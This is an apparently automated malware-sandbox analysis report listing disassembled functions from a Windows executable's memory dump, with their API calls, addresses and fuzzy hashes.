                                                                                                    • Opcode ID: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
                                                                                                    • Instruction ID: 49c33c85c99fa684014fa417ef24a98491c63c9acd110520660b7265e60143fc
                                                                                                    • Opcode Fuzzy Hash: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
                                                                                                    • Instruction Fuzzy Hash: EA01D83360D351BEAF152BB47D95F6B2E94EB15379732822DF410862F0EF554D016688
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00AD5686,00AE3CD6,?,00000000,?,00AD5B6A,?,?,?,?,?,00ACE6D1,?,00B68A48), ref: 00AD2D78
                                                                                                    • _free.LIBCMT ref: 00AD2DAB
                                                                                                    • _free.LIBCMT ref: 00AD2DD3
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DE0
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DEC
                                                                                                    • _abort.LIBCMT ref: 00AD2DF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: 475267bfefeade1e41e22505ef4183352c30c448721f221b58c66fd42227959e
                                                                                                    • Instruction ID: c54e91e07d85fd802926f749a39a06047081a0f2575a4e33a27810297ed91b6b
                                                                                                    • Opcode Fuzzy Hash: 475267bfefeade1e41e22505ef4183352c30c448721f221b58c66fd42227959e
                                                                                                    • Instruction Fuzzy Hash: F1F0A93654460067D71227746D0AB5E39666BF27A1F344417F8A7A33D1EE748901D361
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                                                                                                      • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
                                                                                                      • Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
                                                                                                      • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2
                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B38A4E
                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00B38A62
                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B38A70
                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00B38A80
                                                                                                    • EndPath.GDI32(?), ref: 00B38A90
                                                                                                    • StrokePath.GDI32(?), ref: 00B38AA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 43455801-0
                                                                                                    • Opcode ID: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
                                                                                                    • Instruction ID: 873cf03a549bc195a67fb5b3990a747f52bab3bc1ce7848e2f242fa68114fcdd
                                                                                                    • Opcode Fuzzy Hash: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
                                                                                                    • Instruction Fuzzy Hash: 41111B7600014CFFDF129F98DC88EAA7FACEB08350F108052BA19AA1A1CB719D55DFA0
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00B05218
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B05229
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B05230
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00B05238
                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B0524F
                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B05261
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    • Opcode ID: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
                                                                                                    • Instruction ID: 72f6894503cdf0bfd378e1383b8ca2a9914143ea7a4ad117161c6d38e59f0b33
                                                                                                    • Opcode Fuzzy Hash: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
                                                                                                    • Instruction Fuzzy Hash: 0E014F75A00718BBEB109BE59C49A5EBFB8EF48751F144065FA04F7291DA709800CFA0
                                                                                                    APIs
                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4278518827-0
                                                                                                    • Opcode ID: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
                                                                                                    • Instruction ID: 01b7055dd971590273a8bee69076f1ac98db2d6d4a9f8f5b7555e5f0cdd218b0
                                                                                                    • Opcode Fuzzy Hash: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
                                                                                                    • Instruction Fuzzy Hash: B00167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B0EB30
                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B0EB46
                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00B0EB55
                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB64
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB6E
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 839392675-0
                                                                                                    • Opcode ID: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
                                                                                                    • Instruction ID: bc247652eecefb6e0e75e4552daf319cb62300950205f90a5d83f8595c85f31f
                                                                                                    • Opcode Fuzzy Hash: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
                                                                                                    • Instruction Fuzzy Hash: B7F01772240558BBE7215BA29C0EEAF3E7CEBCAB11F104158F611F20919BA05A0197B5
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?), ref: 00AF7452
                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00AF7469
                                                                                                    • GetWindowDC.USER32(?), ref: 00AF7475
                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00AF7484
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00AF7496
                                                                                                    • GetSysColor.USER32(00000005), ref: 00AF74B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 272304278-0
                                                                                                    • Opcode ID: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
                                                                                                    • Instruction ID: 99106892b2df201128ecc39567570ee64cb0d2f2a1f5a0725c84a6f8ccc0238b
                                                                                                    • Opcode Fuzzy Hash: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
                                                                                                    • Instruction Fuzzy Hash: 88012831400619EFEB515FA8DC0ABAE7FB5FB04312F610164FA15A31A1CF311E51AB50
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B0187F
                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00B0188B
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B01894
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B0189C
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B018A5
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B018AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 146765662-0
                                                                                                    • Opcode ID: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
                                                                                                    • Instruction ID: 1c1a78e2f8e0e4f9274b4f074b83ee7d3b92c2728edcc05a29163456f2b6e241
                                                                                                    • Opcode Fuzzy Hash: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
                                                                                                    • Instruction Fuzzy Hash: D4E0C236004501BBDB015BE1ED0C90ABF29FB49B22B208220F225A2070CF329430EB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C6EE
                                                                                                    • _wcslen.LIBCMT ref: 00B0C735
                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C79C
                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B0C7CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                    • Opcode ID: 4127b78e12a31a5c5ddfe1920071dbd4c171c3b44a76c89a93d73334258e4078
                                                                                                    • Instruction ID: 2aa2e8bfed0fe14239a31c9c54fe4a1fb840b63ab2c9ba89557199a189c96963
                                                                                                    • Opcode Fuzzy Hash: 4127b78e12a31a5c5ddfe1920071dbd4c171c3b44a76c89a93d73334258e4078
                                                                                                    • Instruction Fuzzy Hash: 5251BD716043009BD7259F28C985B6A7FE8EB49310F044BADF9A5E31E1DB60DD048B66
                                                                                                    APIs
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00B2AEA3
                                                                                                      • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00B2AF38
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B2AF67
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                    • String ID: <$@
                                                                                                    • API String ID: 146682121-1426351568
                                                                                                    • Opcode ID: b230ba535a2937c9087d70f58dfd7e4dab091c31f934449ca27f4baabd78d1cb
                                                                                                    • Instruction ID: a824c268e10c2daea0a5f63f8407f84a15e6813815646ee6a534b90f76acd56e
                                                                                                    • Opcode Fuzzy Hash: b230ba535a2937c9087d70f58dfd7e4dab091c31f934449ca27f4baabd78d1cb
                                                                                                    • Instruction Fuzzy Hash: 75718B71A00625DFCB14EF54D584A9EBBF0FF09310F158499E81AAB392CB74ED45CB91
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B07206
                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B0723C
                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B0724D
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B072CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                    • String ID: DllGetClassObject
                                                                                                    • API String ID: 753597075-1075368562
                                                                                                    • Opcode ID: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
                                                                                                    • Instruction ID: 2568dca1bdbd48fb0aaf6c728c3350373ccb359885f0d1223a0e2f45551581d0
                                                                                                    • Opcode Fuzzy Hash: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
                                                                                                    • Instruction Fuzzy Hash: 42416071A44204AFDB15CF54C884A9ABFE9EF45350F2580EDBD059F24ADBB0ED44DBA0
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33E35
                                                                                                    • IsMenu.USER32(?), ref: 00B33E4A
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33E92
                                                                                                    • DrawMenuBar.USER32 ref: 00B33EA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                    • Opcode ID: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
                                                                                                    • Instruction ID: d387dcb0c1aab7659aec8168301d712567ca7e3a5e61fffab4a08274eb1d3fb7
                                                                                                    • Opcode Fuzzy Hash: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
                                                                                                    • Instruction Fuzzy Hash: 77414875A00219EFDB10DF94D884EAABBF9FF49750F2441A9E905AB250DB30AE45CF60
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B01E66
                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B01E79
                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B01EA9
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                    • Opcode ID: dabb7d2526fc7b3b67f2f6cf17c8e4fdccdc32243ffa04a773bfaef06edea5f0
                                                                                                    • Instruction ID: 03a4e41b4d4a0cd43d231a07d502955cede380c11378e22f7ce26e4fd66b1539
                                                                                                    • Opcode Fuzzy Hash: dabb7d2526fc7b3b67f2f6cf17c8e4fdccdc32243ffa04a773bfaef06edea5f0
                                                                                                    • Instruction Fuzzy Hash: A421B771A00104BFDB189BA4DD46CFFBBF9EF46354F144559F815A71E1DB3849069620
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B32F8D
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00B32F94
                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B32FA9
                                                                                                    • DestroyWindow.USER32(?), ref: 00B32FB1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                    • String ID: SysAnimate32
                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                    • Opcode ID: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
                                                                                                    • Instruction ID: 591929f70b62befe8ebbc598f65501c2a19042f93c8fe69a01b0efb0dcd453d2
                                                                                                    • Opcode Fuzzy Hash: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
                                                                                                    • Instruction Fuzzy Hash: 62218C72204205ABEB104FA4DC81EBB77FDEB59364F204658FA50E72A0DB71DC919760
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002), ref: 00AC4D8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AC4DA0
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000), ref: 00AC4DC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
                                                                                                    • Instruction ID: b696c9dd974dcce193b93b9a819d7a072a1b5bfa7b0e35340d2f714607be7842
